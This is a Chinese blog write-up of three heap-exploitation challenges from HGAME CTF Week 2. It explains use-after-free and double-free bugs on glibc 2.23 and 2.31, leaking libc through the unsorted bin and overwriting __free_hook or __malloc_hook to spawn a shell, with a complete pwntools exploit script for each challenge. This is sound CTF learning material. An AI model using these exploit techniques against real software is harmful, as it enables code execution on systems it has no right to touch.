[HgameCtf Week2 ]三道堆题总结

最新推荐文章于 2024-03-07 21:38:17 发布
最新推荐文章于 2024-03-07 21:38:17 发布
阅读量265 收藏 1
点赞数 1
文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42220888/article/details/128740873
版权

editable_note

2.31的堆(加入了tcache double free的检测),保护全开

 程序功能:

1.add:最多申请16个堆块,size小于0xff,index自定

 2.free:堆块没有置0,存在uaf

 3 edit:正常的编辑,size根据之前填入的来确定

 4show:打印内容

思路:存在uaf可以考虑结合show打印出main arena+96的地址来算libc偏移,然后利用tcachebin attack劫持fd指针到free_hook进行改写。

具体步骤:

1.先申请八个堆块进行free,这样第八个堆块就会进入unsorted bin可以用来泄露libc。

for i in range(8):
    add(i,0x80)

for i in range(7):
    dele(i)

add(8,0x10)
dele(7)

show(7)
main_arena=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(hex(main_arena))
libcbase=main_arena-96-0x10-libc.sym['__malloc_hook']
system=libcbase+libc.sym['system'] +0x30
free=libcbase+libc.sym['__free_hook']
malloc_hook=libcbase+libc.sym['__malloc_hook']
print(hex(system))
print(hex(free))

此时show(7)就可以得到main_arena+96的地址了

 2.接下来就是利用tcache bin attack将tcache bin的fd改为free_hook实现任意地址写。

edit(6,p64(free)*2) 之后,可以看到fd已被改成free_hook了。

 接下来申请两个堆就能申请到free_hook上,然后改写为system,接着free一块写有/bin/sh的堆块即可getshell

edit(6,p64(free)*2)
gdb.attach(p)
add(9,0x80)
add(10,0x80)
edit(10,p64(system)*2)
add(11,0xa0)
edit(11,b'/bin/sh\x00'*4)
dele(11)

完整exp:

from pwn import *
from LibcSearcher import *
import hashlib
import time
context(os='linux', arch='amd64', log_level='debug')
#context(os='linux', arch='amd64', log_level='debug')
elf=ELF('./vuln')
libc=ELF('./libc-2.31.so')


mode =0
if mode == 0:
     p=process('./vuln')
else:
    p = remote('week-2.hgame.lwsec.cn',30697)






def add(leng,color):
	p.sendlineafter('>','1')
	p.sendlineafter('Index:',str(leng))
	p.sendlineafter('Size:',str(color))
	
	
	
def dele(id1):
	p.sendlineafter('>','2')
	p.sendlineafter('Index:',str(id1))	


	
def show(id1):
	p.sendlineafter('>','4')
	p.sendlineafter('Index:',str(id1))	
	
def edit(id1,name):
	p.sendlineafter('>','3')
	p.sendlineafter('Index:',str(id1))	
	p.sendafter('Content:',name)




for i in range(8):
    add(i,0x80)

for i in range(7):
    dele(i)

add(8,0x10)
dele(7)

show(7)
main_arena=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(hex(main_arena))
libcbase=main_arena-96-0x10-libc.sym['__malloc_hook']
system=libcbase+libc.sym['system'] +0x30
free=libcbase+libc.sym['__free_hook']
malloc_hook=libcbase+libc.sym['__malloc_hook']
print(hex(system))
print(hex(free))

edit(6,p64(free)*2)
gdb.attach(p)
add(9,0x80)
add(10,0x80)
edit(10,p64(system)*2)
add(11,0xa0)
edit(11,b'/bin/sh\x00'*4)
dele(11)



p.interactive()

总结:这算是一道入门级别的2.31堆题了,功能较为齐全,漏洞的利用也比较清晰,只要稍微了解一下2.31堆的机制应该就能做出来。

这里有个问题,我在patch2.31-0ubuntu9.9时出现下面的错误,但是不太懂怎么搞。

fast_note

2.23的堆,Partial RELRO 题目叫fast_note可以考虑fastbin attack。

程序功能:

1add:申请指定index的堆,最多16个,会填入内容,size小于0xff

 2.free:经典uaf了,直接猜测时fastbin doublefree

3 show:泄露功能,可以用来泄露libc

 

思路:先利用unsortedbin attack 泄露地址,然后利用fastbin double free实现地址任意写。

具体步骤:

1.先申请了0x80的堆块可以实现main arena的泄露。

add(0,0x80,'aaaa')
add(1,0x80,'aaaa')
add(2,0x60,'aaaa')
add(3,0x60,'aaaa')
add(4,0xc0,'aaaa')
dele(1)
show(1)
addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
libcbase=addr-88-0x10-libc.sym['__malloc_hook']
print(hex(addr))
free=libcbase+libc.sym['__free_hook']
system=libcbase+libc.sym['system']
malloc_hook=libcbase+libc.sym['__malloc_hook']
one=[0x45226,0x4527a,0xf03a4,0xf1247]

onegadget=libcbase+one[3]
print(hex(free))
print(hex(system))
print(hex(onegadget))

2.接下来利用double free实现地址任意写

dele(2)
dele(3)
dele(2)
add(5,0x60,p64(malloc_hook-0x23))

 可以看到fastbin里已经有指向malloc_hook-0x23了(这里-0x23处有7f可以用于绕过size检测)

接下来再申请三个堆就可以申请到我们想要的地址了。

 3.往malloc_hook中写入onegadget 然后free一个堆块两次就能get shell了

add(6,0x60,b'aaaa')
add(7,0x60,b'bbbb')
payload=b'\x00'*3+p64(0)*2+p64(onegadget)
add(9,0x60,payload)
dele(2)
dele(2)

完整exp:

from pwn import *
from LibcSearcher import *
import hashlib
import time
context(os='linux', arch='amd64', log_level='debug')
#context(os='linux', arch='amd64', log_level='debug')
elf=ELF('./vuln')
libc=ELF('./libc-2.23.so')


mode =0
if mode == 0:
    p = process("./vuln")
else:
    p = remote('week-2.hgame.lwsec.cn',32569)





def add(leng,size,content):
	p.sendlineafter('>','1')
	p.sendlineafter('Index:',str(leng))
	p.sendlineafter('Size:',str(size))
	p.sendafter('Content:',content)
	
	
	
def dele(id1):
	p.sendlineafter('>','2')
	p.sendlineafter('Index:',str(id1))	


	
def show(id1):
	p.sendlineafter('>','3')
	p.sendlineafter('Index:',str(id1))	
	
def edit(id1,name):
	p.sendlineafter('>','3')
	p.sendlineafter('Index:',str(id1))	
	p.sendafter('Content:',name)


add(0,0x80,'aaaa')
add(1,0x80,'aaaa')
add(2,0x60,'aaaa')
add(3,0x60,'aaaa')
add(4,0xc0,'aaaa')
dele(1)
show(1)
addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))

libcbase=addr-88-0x10-libc.sym['__malloc_hook']
print(hex(addr))
free=libcbase+libc.sym['__free_hook']
system=libcbase+libc.sym['system']
malloc_hook=libcbase+libc.sym['__malloc_hook']
one=[0x45226,0x4527a,0xf03a4,0xf1247]

onegadget=libcbase+one[3]
print(hex(free))
print(hex(system))
print(hex(onegadget))
dele(2)
dele(3)
dele(2)
add(5,0x60,p64(malloc_hook-0x23))
gdb.attach(p)
add(6,0x60,b'aaaa')

add(7,0x60,b'bbbb')
payload=b'\x00'*3+p64(0)*2+p64(onegadget)
add(9,0x60,payload)
dele(2)
dele(2)


'''
p.sendlineafter('>','1')
p.sendlineafter('Index:',str(10))
p.sendlineafter('Size:',str(0x60))

'''
p.interactive()

小结:此处改malloc_hook为onegadget后,不知道为什么再调用add函数不能getshel而free一个堆块两次却可以,有无大佬知道原因,求教教。

new_fast_note

又是2.31的保护全开的堆 

程序功能:

1.add:和上题差不多,这次最多有20个堆

 2 free:还是uaf,不多说了

 3.show

思路:

泄露libc的思路还是和前边一样,先填满tcache bin然后泄露unsorted bin中的fd指针。接下来再申请0x40的堆填满tcachebin (这里试了一下,如果add的index一样的话就不会多占一个page)然后在实现fastbin的doublefree,(其实2.31好像没有fastbin double free的检测了可以直接free两次,但是我给忘记了)再将tcachebin 中的堆块申请出去这样fastbin中的堆就会自动进入 tcache bin中。最后通过改fd指针实现地址任意写就行。

1.经典的libc泄露那一套,这里13号堆我用来放置top chunk合并(不知道有没有用)。

for i in range(8):
   add(i,0x80,'aaaa')
   
add(13,0xf0,'bbbb')
for i in range(8):   
   dele(i)

show(7)
addr=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(hex(addr))
malloc_hook=addr-96-0x10
print(hex(malloc_hook))
libcbase=addr-96-0x10-libc.sym['__malloc_hook']
system=libcbase+libc.sym['system']
free=libcbase+libc.sym['__free_hook']
one=[0xe3afe,0xe3b01,0xe3b04]
onegadget=libcbase+one[1]

2.接下来不断申请fastbin大小的堆再free掉,然后实现double free

for i in range(9):
   add(i,0x40,'aaaa')

for i in range(9):   
   dele(i)

dele(7)

可以看到double free已经成功

 3.接下来将0x40的tcache bin清空,这时我再申请0x40的堆块并写入free_hook,fastbin中的堆便会进入tcache中,并且fd也会改写成功 

for i in range(7):
   add(i,0x40,'aaaa')
   
add(7,0x40,p64(free))
add(8,0x40,'aaaa')
add(9,0x40,b'/bin/sh\x00')
add(10,0x40,p64(system))
dele(9)

这样我们再申请三个堆就能申请到free_hook中去

 完整exp:

from pwn import *
from LibcSearcher import *
import hashlib
import time
context(os='linux', arch='amd64', log_level='debug')
#context(os='linux', arch='amd64', log_level='debug')
elf=ELF('./vuln')
libc=ELF('./libc-2.31.so')


mode =0
if mode == 0:
    p = process("./vuln")
else:
    p = remote('week-2.hgame.lwsec.cn',30329)





def add(leng,size,content):
	p.sendlineafter('>','1')
	p.sendlineafter('Index:',str(leng))
	p.sendlineafter('Size:',str(size))
	p.sendafter('Content:',content)
	
	
	
def dele(id1):
	p.sendlineafter('>','2')
	p.sendlineafter('Index:',str(id1))	


	
def show(id1):
	p.sendlineafter('>','3')
	p.sendlineafter('Index:',str(id1))	
	
def edit(id1,name):
	p.sendlineafter('>','3')
	p.sendlineafter('Index:',str(id1))	
	p.sendafter('Content:',name)


for i in range(8):
   add(i,0x80,'aaaa')
   
add(13,0xf0,'bbbb')
for i in range(8):   
   dele(i)

show(7)
addr=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(hex(addr))
malloc_hook=addr-96-0x10
print(hex(malloc_hook))
libcbase=addr-96-0x10-libc.sym['__malloc_hook']
system=libcbase+libc.sym['system']
free=libcbase+libc.sym['__free_hook']
one=[0xe3afe,0xe3b01,0xe3b04]
onegadget=libcbase+one[1]

for i in range(9):
   add(i,0x40,'aaaa')

for i in range(9):   
   dele(i)

dele(7)

for i in range(7):
   add(i,0x40,'aaaa')
   
add(7,0x40,p64(free))
gdb.attach(p)
add(8,0x40,'aaaa')
add(9,0x40,b'/bin/sh\x00')
add(10,0x40,p64(system))
dele(9)

'''
for i in range(9):
   add(i,0x40,'aaaa')
for i in range(9):   
   dele(i)
for i in range(9):
   add(i,0x40,'aaaa')
'''


#gdb.attach(p)

p.interactive()

关于2.31 double的利用我觉得这位师傅讲的挺好的,感兴趣的可以看看。

mahj0ng
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
heap之double free
weixin_44113469的博客
04-14 496
susctf tache_pwn 利用double free 控制全局变量,泄露puts函数地址,查出libc库,利用malloc_hook写入one_gadget执行。 为了加深理解,画了一个图 malloc_hook 钩子利用同理。 exp from pwn import* p = remote("211.65.197.117",10007) a = ELF("./libc6_2.2...
数学分析B2习题课 Week 6
08-19
Recitation Week 6 第十一次作业(2020.03.13)
*CTF-2022 examination 题解
CoLin的pwn小屋
04-23 1857
*CTF 2022 examination 题解
HgameCTF 2024 web&misc wp
Nanian233的博客
03-07 733
HgameCTF 2024 web&misc 个人wp
[CTF]HGAME2021 WP
Sapphire037的博客
02-18 1387
MISC 群青(其实是幽灵东京) wav,audicaty看频谱图 文件属性让我们试试silenteye,解密得到 访问,下载后文件名提示了SSTV,可以扫出 hgame{1_c4n_5ee_the_wav} WEB Fujiwara Tofu Shop 首先给了 猜到是要加referer头,所以加个头referer: qiumingshan.net 然后 那么我们知道 User Agent中文名为用户代理,简称 UA,它是一个特殊字符串头,使得服务器能够识别客户使用的操作系统及版本、CPU 类型、
2019 D^3CTF new_heap详细题解
seaaseesa的博客
11-28 1440
new_heap(高质量题) 这题是2019 d3ctf赛的一题,当时没做出来,后来看了大佬的exp脚本,慢慢研究,终于明白了原理,现在,我们就来详细的解析一下这题 首先,我们还是检查一下程序的保护机制,保护全开 再看一下给我们的libc.so.6的版本,可见是glibc2.29,那么对于的管理,就存在tcache机制 程序只有简单的3个功能,没有show,也没有edit,这让我...
CTF-Hgame_accuracy_writeup
qq_19917367的博客
07-29 425
把相关的代码记录一下, 方便以后使用 accuracy 石碑上的文字,究竟隐藏着怎样的秘密…… Write Up 题目给出两个文件, chars.csv dataset.csv, 简单查看之后,dataset是数据集, chars是测试集 数据集是由784个pixel, 即 28 * 28 df.iloc[:,0].unique() #array([10, 11, 12, 13, 14, 15, 1, 0, 4, 7, 3, 5, 8, 9, 2, 6]) 查看标签,共有1
Python逆向基本操作步骤详解——以杭电新生赛hgame week2 reverse stream(python3.10逆向)为例
OrientalGlass的博客
01-16 3773
即: C:\Users\admin\AppData\Local\Programs\Python\Python310\Lib\site-packages\PyInstaller\utils\cliutils\archive_viewer.py。在文件夹内找到stream.pyc和struct.pyc文件,用winhex或者010editor打开,将struct文件的第一行(Magic head)复制到stream.pyc的最前面,保存更改。继续使用命令即可输出stream.pyc和struct.pyc文件。
Tcache Attack(3)
yms0211的博客
09-16 748
tcache attack(3)
Week12-选做题2(状压DP)
01-03
问题描述 马上假期就要结束了,zjm还有 n 个作业,完成某个作业需要一定的时间,而且每个作业有一个截止时间,若超过截止时间,一天就要扣一分。 zjm想知道如何安排做作业,使得扣的分数最少。 ...
吴恩达神经网络WEEK1实验2代码内容
05-20
吴恩达神经网络WEEK1实验2代码内容 編程作業: Convolution Model Application week1-2
Week3总结1
08-08
Week3总结1
2_week3.do
最新发布
04-06
2_week3.do
HGAME 2024 WEEK2 Web方向题解 全
Jay17的博客
02-14 1659
HGAME 2024 WEEK2 Web方向题解 全
利用 TCache attack(libc2.26)
c_z_y_c_z_x的博客
05-08 231
在TCache机制中,它为每个线程创建一个缓存,里面包含一些小块,无需对arena上锁即可使用,这种无锁分配算法能有不错的效率提升。在Glibc的2.26中 新增了Tcache机制 这是ptmalloc2的Tcache在glibc中是默认开启的,在Tcache被开启的时候会定义如下东西Tcache为每个线程都预留了这样一个特殊的bins, bin的数量是64个 每个bin中最多缓存7个chunk。在64位系统上以0x10的字节递增,。32位系统上则,所以Tcache缓存的是。
[PWN] 泄露libc HarekazeCTF_2019_baby_rop2
LDX的博客
11-28 609
pwn 64位 泄露libc版本
BUU_ciscn_2019_final_5临界条件处理
qq_70452545的博客
04-15 91
buu_ciscn_2019_final_5 wp记录
hgame2023-week2
247533的博客
01-20 971
hgame week2
[HNCTF 2022 WEEK2]ez_ssrf
07-27
\[HNCTF 2022 WEEK2\]ez_ssrf是一个题目或挑战的名称,它涉及到SSRF(Server-Side Request Forgery)攻击。在这个挑战中,通过构造恶意的请求,攻击者可以利用目标服务器发起未经授权的请求,可能导致信息泄露、远程代码执行等安全问题。根据引用\[2\]中的代码片段,这个挑战可能涉及到通过传递参数来实现SSRF攻击,其中包括目标主机和端口。具体的攻击方法和解决方案需要根据题目的具体要求和环境来确定。 #### 引用[.reference_title] - *1* *2* [SSRF总结](https://blog.csdn.net/weixin_53090346/article/details/129025771)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [2022 SWPU新生赛&HNCTF web部分题目](https://blog.csdn.net/weixin_63231007/article/details/127135455)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值